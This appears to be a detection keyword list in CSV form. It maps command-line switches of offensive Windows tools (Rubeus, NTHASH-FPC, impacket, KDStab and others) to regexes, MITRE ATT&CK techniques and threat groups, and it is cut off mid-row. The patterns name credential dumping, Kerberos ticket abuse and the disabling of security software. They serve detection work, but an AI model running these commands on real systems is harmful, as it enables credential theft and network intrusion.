"* /creduser:* /credpassword:*",".{0,1000}\s\/creduser\:.{0,1000}\s\/credpassword\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","60"
"* /decodemk /binary:* /password:*",".{0,1000}\s\/decodemk\s\/binary\:.{0,1000}\s\/password\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","61"
"* /domain:* /dc:* /getcredentials /nowrap*",".{0,1000}\s\/domain\:.{0,1000}\s\/dc\:.{0,1000}\s\/getcredentials\s\/nowrap.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","62"
"* /dumpsecret /input:* /system*",".{0,1000}\s\/dumpsecret\s\/input\:.{0,1000}\s\/system.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","63"
"* /dumpsecret /input:defaultpassword*",".{0,1000}\s\/dumpsecret\s\/input\:defaultpassword.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","64"
"* /dumpsecret /input:dpapi_system /offline*",".{0,1000}\s\/dumpsecret\s\/input\:dpapi_system\s\/offline.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","65"
"* /gethmac /mode:hashid /input:* /key:*",".{0,1000}\s\/gethmac\s\/mode\:hashid\s\/input\:.{0,1000}\s\/key\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","69"
"* /GetKeys WirelessKeyView*",".{0,1000}\s\/GetKeys\sWirelessKeyView.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","70"
"* /getlsasecret /input:*",".{0,1000}\s\/getlsasecret\s\/input\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","71"
"* /getntlmhash /password:*",".{0,1000}\s\/getntlmhash\s\/password\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","72"
"* /getntlmhash | wtee *.ntlm*",".{0,1000}\s\/getntlmhash\s\|\swtee\s.{0,1000}\.ntlm.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","73"
"* /getsamkey /offline*",".{0,1000}\s\/getsamkey\s\/offline.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","74"
"* /impersonateuser:* /msdsspn:* /ptt*",".{0,1000}\s\/impersonateuser\:.{0,1000}\s\/msdsspn\:.{0,1000}\s\/ptt.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","75"
"* /ldap * /printcmd*",".{0,1000}\s\/ldap\s.{0,1000}\s\/printcmd.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","76"
"* /ldapfilter:'admincount=1'*",".{0,1000}\s\/ldapfilter\:\'admincount\=1\'.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","77" "* /m:assembly /p:beacon.exe*",".{0,1000}\s\/m\:assembly\s\/p\:beacon\.exe.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","78" "* /m:assembly /p:getMailBox.exe*",".{0,1000}\s\/m\:assembly\s\/p\:getMailBox\.exe.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","79" "* /modules:* /target:* /linkedsql:*",".{0,1000}\s\/modules\:.{0,1000}\s\/target\:.{0,1000}\s\/linkedsql\:.{0,1000}","offensive_tool_keyword","SharpSQLPwn","C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lefayjey/SharpSQLPwn","1","0","N/A","N/A","N/A","2","111","20","2022-02-13T19:15:36Z","2022-01-20T19:58:07Z","80" "* /NAME:* /KILL*",".{0,1000}\s\/NAME\:.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","82" "* /nofullpacsig *",".{0,1000}\s\/nofullpacsig\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","83" "* /outfile:* /spn:*",".{0,1000}\s\/outfile\:.{0,1000}\s\/spn\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","84" "* /outfile:* /spns:*",".{0,1000}\s\/outfile\:.{0,1000}\s\/spns\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","85" "* /PID:* /DRIVER:*",".{0,1000}\s\/PID\:.{0,1000}\s\/DRIVER\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - 
COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","86" "* /PID:* /KILL*",".{0,1000}\s\/PID\:.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","87" "* /potato.local*",".{0,1000}\s\/potato\.local.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection 
attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","88" "* /ptt /binary:*.kirbi*",".{0,1000}\s\/ptt\s\/binary\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","89" "* /pwdsetafter:*",".{0,1000}\s\/pwdsetafter\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","90" "* /pwdsetbefore:*",".{0,1000}\s\/pwdsetbefore\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","91" "* /Q /C >1 \\127.0.01\ADMIN$\__*",".{0,1000}\s\/Q\s\/C\s\>1\s\\\\127\.0\.01\\ADMIN\$\\__.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","92" "* /rc4opsec *",".{0,1000}\s\/rc4opsec\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","94" "* /s4uproxytarget*",".{0,1000}\s\/s4uproxytarget.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","96" "* /s4uproxytarget:* /s4utransitiedservices:*",".{0,1000}\s\/s4uproxytarget\:.{0,1000}\s\/s4utransitiedservices\:.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","97" "* /s4utransitedservices*",".{0,1000}\s\/s4utransitedservices.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","98" "* /service:krbtgt *",".{0,1000}\s\/service\:krbtgt\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","99" "* /setntlm * /user:* /newhash:*",".{0,1000}\s\/setntlm\s.{0,1000}\s\/user\:.{0,1000}\s\/newhash\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","100" "* /setntlm * /user:* 
/newpwd:*",".{0,1000}\s\/setntlm\s.{0,1000}\s\/user\:.{0,1000}\s\/newpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","101" "* /simple * /spn*",".{0,1000}\s\/simple\s.{0,1000}\s\/spn.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","102" "* /taskname:Cleanup *",".{0,1000}\s\/taskname\:Cleanup\s.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","103" "* /ticket *.kirbi*",".{0,1000}\s\/ticket\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","104" "* /ticket:* /autoenterprise *",".{0,1000}\s\/ticket\:.{0,1000}\s\/autoenterprise\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - 